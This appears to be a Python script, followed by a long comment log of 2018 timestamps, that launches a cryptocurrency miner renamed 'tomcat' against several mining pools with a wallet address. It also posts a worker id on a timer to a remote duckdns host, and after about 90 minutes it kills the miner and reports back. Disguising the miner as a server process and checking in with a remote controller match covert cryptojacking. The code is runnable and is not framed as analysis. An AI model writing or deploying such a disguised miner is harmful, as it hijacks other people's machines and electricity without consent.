import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:18:07.526323
#2018-02-17 17:08:01.841082
#2018-02-17 18:55:07.076170
#2018-02-17 20:43:01.624891
#2018-02-17 22:30:01.644142
#2018-02-18 00:13:01.775695
#2018-02-18 02:05:03.642540
#2018-02-18 03:52:03.840559
#2018-02-18 05:39:03.696375
#2018-02-18 07:32:06.360613
#2018-02-18 09:20:01.316222
#2018-02-18 11:06:01.464718
#2018-02-18 12:53:06.130066
#2018-02-18 14:41:01.286327
#2018-02-18 16:30:08.213253
#2018-02-18 18:19:01.367112
#2018-02-18 20:04:05.354875
#2018-02-18 21:51:04.020730
#2018-02-18 23:40:08.378831
#2018-02-19 01:26:03.675858
#2018-02-19 03:14:06.992022
#2018-02-19 04:59:06.845754
#2018-02-19 06:43:06.401959
#2018-02-19 08:34:05.777579
#2018-02-19 10:23:06.601900
#2018-02-19 12:11:06.050598
#2018-02-19 13:58:06.598768
#2018-02-19 15:48:05.857449
#2018-02-19 17:37:05.988288
#2018-02-19 19:25:05.156321
#2018-02-19 21:11:01.485235
#2018-02-19 22:59:01.440680
#2018-02-20 00:42:07.663188
#2018-02-20 02:32:01.665222
#2018-02-20 04:21:04.806741
#2018-02-20 06:06:06.702750
#2018-02-20 07:51:05.657879
#2018-02-20 09:37:01.832611
#2018-02-20 11:20:09.157115
#2018-02-20 13:07:08.381926
#2018-02-20 14:52:04.824938
#2018-02-20 16:39:04.378431
#2018-02-20 18:26:04.456736
#2018-02-20 20:19:04.176280
#2018-02-20 22:04:04.043151
#2018-02-20 23:44:06.773430
#2018-02-21 01:29:01.379962
#2018-02-21 03:17:06.371179
#2018-02-21 05:04:08.109789
#2018-02-21 06:52:11.193266
#2018-02-21 08:40:08.666058
#2018-02-21 10:27:05.650095
#2018-02-21 12:16:01.891024
#2018-02-21 14:04:04.848606
#2018-02-21 15:51:09.875439
#2018-02-21 17:43:06.563093
#2018-02-21 19:28:05.767485
#2018-02-21 21:18:06.421086
#2018-02-21 23:04:06.137400
#2018-02-22 00:54:04.247630
#2018-02-22 02:43:04.043005
#2018-02-22 04:30:04.587812
#2018-02-22 06:15:07.991268
#2018-02-22 07:59:06.067534
#2018-02-22 09:48:08.619462
#2018-02-22 11:34:06.438486
#2018-02-22 13:21:06.517392
#2018-02-22 15:11:01.277620
#2018-02-22 16:54:12.244266
#2018-02-22 18:43:05.418564
#2018-02-22 20:35:01.352695
#2018-02-22 22:20:09.601797
#2018-02-23 00:07:04.028676
#2018-02-23 01:58:01.786018
#2018-02-23 03:34:04.134967
#2018-02-23 05:18:06.375880
#2018-02-23 07:04:07.150078
#2018-02-23 08:52:08.418868
#2018-02-23 11:10:08.329368
#2018-02-23 13:03:08.721564
#2018-02-23 14:48:11.875531
#2018-02-23 16:37:01.960221
#2018-02-23 18:24:07.489964
#2018-02-23 20:09:06.195132
#2018-02-23 21:58:03.815834
#2018-02-23 23:46:03.530430
#2018-02-24 01:39:04.912116
#2018-02-24 03:29:07.630473
#2018-02-24 05:15:05.634942
#2018-02-24 07:03:06.714422
#2018-02-24 08:35:08.538392
#2018-02-24 10:10:01.433582
#2018-02-24 11:57:03.846724
#2018-02-24 13:23:04.222918
#2018-02-24 14:55:05.550907
#2018-02-24 16:28:07.386517
#2018-02-24 18:05:06.467738
#2018-02-24 19:35:03.137001
#2018-02-24 21:10:08.231263
#2018-02-24 23:15:03.287809
#2018-02-25 01:34:07.283830
#2018-02-25 04:53:01.590276
#2018-02-25 08:17:01.459498